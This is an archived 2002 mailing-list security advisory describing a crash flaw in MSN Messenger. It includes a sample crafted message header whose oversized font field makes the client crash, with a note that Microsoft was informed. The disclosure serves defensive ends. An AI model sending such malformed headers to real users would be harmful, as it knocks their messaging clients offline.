('binary' encoding is not supported, stored as-is) Introduction to the flaw. Msn Messenger is a popular Instant-Messaging client from Microsoft. After the previous flaws regarding the privacy of users another flaw is discovered. This flaw makes the msn messenger client crash after receiving a misformated font variable in the message header with instant messages. How does it work exactly? The Msn Messenger client works by sending a header with every message. So every time a user wants to send a message, it generates a header, containing information about the font, the color of the message and some other information. The flaw A normal header look something like this: <start> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0; PF=22 hey friend, how are you? <end> When we replace the font field with something very large. Creating an overflaw the header will look like this: <start> MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20 %20New%20%20%20%20%20%20%20%20%20%20 %20%20%20%20%20%20%20%20%20%20%20%20 Roman%20%20%20%20%20%20%20%20%20%20%20; EF=B; CO=ff; CS=0; PF=22 hey friend, how are you? <end> As a result the Msn Messenger client will crash this flaw only crashes the Msn Messenger from Microsoft. Trillian is not affected. This flaw is a severe danger. As it's not so hard for hackers to use this flaw in their application. Microsoft has been informed on this issue.
This archive was generated by hypermail 2b30 : Mon May 06 2002 - 12:04:31 PDT